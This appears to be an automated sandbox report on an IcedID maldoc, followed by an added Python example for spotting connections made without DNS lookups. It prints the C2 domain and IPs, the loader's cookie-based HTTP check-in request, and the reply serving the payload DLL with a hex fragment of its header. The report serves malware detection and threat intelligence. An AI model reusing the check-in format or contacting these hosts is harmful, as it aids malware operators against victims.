Windows Analysis Report
courtesyautomotivedoc08.11.doc

Overview

General Information

Sample Name:courtesyautomotivedoc08.11.doc
Analysis ID:682567
MD5:00e8f42e0462d4abf8a6bb6960abe5b5
SHA1:0235d1eb73c161a7fcc944d99730d8ed0200fb8e
SHA256:3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44
Tags: doc, IcedID

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for dropped file
Yara detected IcedID
Submitted sample is a known malware sample
Office process drops PE file
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Yara signature match
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2032 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • r9093.tmp.exe (PID: 1488 cmdline: "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
      • rundll32.exe (PID: 2480 cmdline: "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1 MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup
{"Campaign ID": 3570055661, "C2 url": "alexbionka.com"}
Source | Rule | Description | Author | Strings
00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp | Windows_Trojan_IcedID_0b62e783 | unknown | unknown
  • 0x876:$a: 89 44 95 E0 83 E0 07 8A C8 42 8B 44 85 E0 D3 C8 FF C0 42 89 44
00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp | Windows_Trojan_IcedID_91562d18 | unknown | unknown
  • 0x1bc4:$a: 44 8B 4C 19 2C 4C 03 D6 74 1C 4D 85 C0 74 17 4D 85 C9 74 12 41
00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp | Windows_Trojan_IcedID_48029e37 | unknown | unknown
  • 0x1190:$a: 48 C1 E3 10 0F 31 48 C1 E2 20 48 0B C2 0F B7 C8 48 0B D9 8B CB 83 E1
00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp | Windows_Trojan_IcedID_11d24d35 | unknown | unknown
  • 0x3d0:$a2: loader_dll_64.dll
00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_IcedID_6 | Yara detected IcedID | Joe Security
    Source | Rule | Description | Author | Strings
    5.2.rundll32.exe.2fab68.0.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
    • 0x1bd0:$internal_name: loader_dll_64.dll
    • 0x1f08:$string6: WINHTTP.dll
    • 0x1bf4:$string7: DllRegisterServer
    • 0x1c06:$string8: PluginInit
    5.2.rundll32.exe.2fab68.0.unpack | Windows_Trojan_IcedID_11d24d35 | unknown | unknown
    • 0x1bd0:$a2: loader_dll_64.dll
    5.2.rundll32.exe.2fab68.0.unpack | Windows_Trojan_IcedID_91562d18 | unknown | unknown
    • 0x13c4:$a: 44 8B 4C 19 2C 4C 03 D6 74 1C 4D 85 C0 74 17 4D 85 C9 74 12 41
    5.2.rundll32.exe.2fab68.0.unpack | Windows_Trojan_IcedID_48029e37 | unknown | unknown
    • 0x990:$a: 48 C1 E3 10 0F 31 48 C1 E2 20 48 0B C2 0F B7 C8 48 0B D9 8B CB 83 E1
    5.2.rundll32.exe.180000000.1.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
    • 0x27d0:$internal_name: loader_dll_64.dll
    • 0x3198:$string0: _gat=
    • 0x3048:$string1: _ga=
    • 0x30a0:$string2: _gid=
    • 0x3118:$string3: _u=
    • 0x303a:$string4: _io=
    • 0x3054:$string5: GetAdaptersInfo
    • 0x2b08:$string6: WINHTTP.dll
    • 0x27f4:$string7: DllRegisterServer
    • 0x2806:$string8: PluginInit
    • 0x3134:$string9: POST
    No Sigma rule has matched
    No Snort rule has matched

    AV Detection

    Source: courtesyautomotivedoc08.11.doc | Virustotal: Detection: 26%
    Source: courtesyautomotivedoc08.11.doc | ReversingLabs: Detection: 17%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dll | Avira: detection malicious, Label: HEUR/AGEN.1251556
    Source: C:\Users\user\AppData\Local\Temp\y875E.tmp.dll | Avira: detection malicious, Label: HEUR/AGEN.1251556
    Source: Yara match | File source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPE
    Source: Yara match | File source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 2480, type: MEMORYSTR
    Source: Yara match | File source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE
    Source: courtesyautomotivedoc08.11.doc | Joe Sandbox ML: detected
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: IcedID {"Campaign ID": 3570055661, "C2 url": "alexbionka.com"}
    Source: C:\Windows\System32\rundll32.exe | Code function: 5_2_000007FEF7532CDA CryptCreateHash, 5_2_000007FEF7532CDA
    Source: C:\Windows\System32\rundll32.exe | Code function: 5_2_000007FEF7532CCA CryptCreateHash, 5_2_000007FEF7532CCA
    Source: C:\Windows\System32\rundll32.exe | Code function: 5_2_000007FEF7532CF7 CryptCreateHash, CryptAcquireContextW, 5_2_000007FEF7532CF7
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: rundll32.pdb | source: r9093.tmp.exe, r9093.tmp.exe, 00000004.00000000.924895395.0000000000761000.00000020.00000001.01000000.00000003.sdmp, r9093.tmp.exe, 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, r9093.tmp.exe.1.dr

    Software Vulnerabilities

    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dll.1.dr
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dll
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\y875E.tmp.dll
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\r9093.tmp.exe
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Users\user\AppData\Local\Temp\r9093.tmp.exe
    Source: global traffic | DNS query: name: alexbionka.com
    Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global traffic | TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 64.227.108.27:80
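    The segment records above are the input for the "TCP traffic detected without corresponding DNS query" check that the report raises for 45.8.146.139: a destination reached by IP with no DNS answer for it earlier in the capture. The Python below is an added example written for this page, not Joe Sandbox's own logic. The event list is constructed from the endpoints the report shows; the A record for alexbionka.com is assumed to be 64.227.108.27 because the report pairs the domain query and that address under the same rundll32.exe process, and the resolver row is invented to show that private destinations are skipped.

```python
"""Correlate TCP connections with DNS answers seen earlier in the same
capture. Added example, not sandbox code. Events are (kind, src, dst) in
capture order; "dns" rows carry the queried name and the answer address,
"tcp" rows carry ip:port endpoints."""
import ipaddress
from collections import Counter

SAMPLE_EVENTS = [  # constructed from the report's endpoints
    ("tcp", "192.168.2.22:49173", "45.8.146.139:80"),   # hard-coded IP, no lookup
    ("tcp", "192.168.2.22:49173", "45.8.146.139:80"),
    ("dns", "alexbionka.com", "64.227.108.27"),          # answer assumed
    ("tcp", "192.168.2.22:49174", "64.227.108.27:80"),   # rundll32.exe check-in
    ("tcp", "192.168.2.22:49175", "192.168.2.1:53"),     # invented resolver row, private
]


def connections_without_dns(events):
    """Return {dst_ip: segment_count} for every public destination contacted
    before any DNS answer named it. Counting segments rather than flows
    mirrors the per-packet hits the report emits; use len() on the result
    when only distinct IPs matter. A DNS answer that arrives after the
    connection does not clear earlier hits: the process already knew the
    address without asking."""
    resolved = set()
    hits = Counter()
    for kind, _src, dst in events:
        if kind == "dns":
            resolved.add(dst)
            continue
        if kind != "tcp":
            continue
        dst_ip = dst.rsplit(":", 1)[0]
        addr = ipaddress.ip_address(dst_ip)
        if addr.is_private or addr.is_loopback:
            continue          # hosts legitimately reach LAN services by IP
        if dst_ip not in resolved:
            hits[dst_ip] += 1
    return dict(hits)


def unresolved_flows(events):
    """Distinct (src, dst) endpoint pairs that hit an unresolved IP."""
    unresolved = set(connections_without_dns(events))
    return sorted({(s, d) for k, s, d in events
                   if k == "tcp" and d.rsplit(":", 1)[0] in unresolved})


if __name__ == "__main__":
    print(connections_without_dns(SAMPLE_EVENTS))
    print(unresolved_flows(SAMPLE_EVENTS))
```

    The check is only as good as the DNS visibility in the capture: a loader that resolves its domain through DoH, or a host whose resolver cache already held the answer, produces the same "no DNS" hit, so treat it as a prompt to look at the process that opened the socket rather than as proof of a hard-coded C2.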

    Networking

    Source: C:\Windows\System32\rundll32.exe | Network Connect: 64.227.108.27 80
    Source: C:\Windows\System32\rundll32.exe | Domain query: alexbionka.com
    Source: Malware configuration extractor | URLs: alexbionka.com
    Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
    Source: global traffic | HTTP traffic detected (request; no User-Agent header):
        GET / HTTP/1.1
        Connection: Keep-Alive
        Cookie: __gads=3570055661:1:6727:57; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323834393932:416C627573:31463945303738373942323239343237; __io=0; _gid=67AFEDC5AC03
        Host: alexbionka.com
    Note: a bare GET / whose only distinguishing header is this set of Google-Analytics-lookalike cookies (__gads, _gat, _ga, _u, __io, _gid) is the IcedID loader check-in format described in public analyses of the family. The _u value is colon-separated hex-encoded ASCII (it decodes to 284992, Albus and 1F9E07879B229427), and _gat=6.1.7601.64 is consistent with the Windows 7 SP1 x64 build that the dropped executable's User-Agent further down also reports.
    Source: Joe Sandbox View | IP Address: 64.227.108.27
    Source: global traffic | HTTP traffic detected (the 200 reply that follows the GET / above):
        HTTP/1.1 200 OK
        Date: Thu, 11 Aug 2022 15:38:26 GMT
        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
        X-Powered-By: PHP/7.2.34
        Content-Description: File Transfer
        Content-Disposition: attachment; filename="loader_p3_dll_64_n3_crypt_x64_asm_clone_n14.dll"
        Expires: 0
        Cache-Control: must-revalidate
        Pragma: public
        Content-Length: 360448
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/octet-stream
        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 55 ef 34 c3 11 8e 5a 90 11 8e 5a 90 11 8e 5a 90 02 e9 59 91 10 8e 5a 90 59 e0 5a 91 10 8e 5a 90 33 e6 a5 90 10 8e 5a 90 6a e1 58 91 10 8e 5a 90 52 69 63 68 11 8e 5a 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 59 d1 f4 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 0e 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 0a 00 06 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 91 9d 05 00 03 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 90 05 00 7d 01 00 00 00 00 00 00 00 00 00 00 00 a0 05 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 77 05 00 00 10 00 00 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7d 01 00 00 00 90 05 00 00 02 00 00 00 7c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 a0 05 00 00 02 00 00 00 7e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 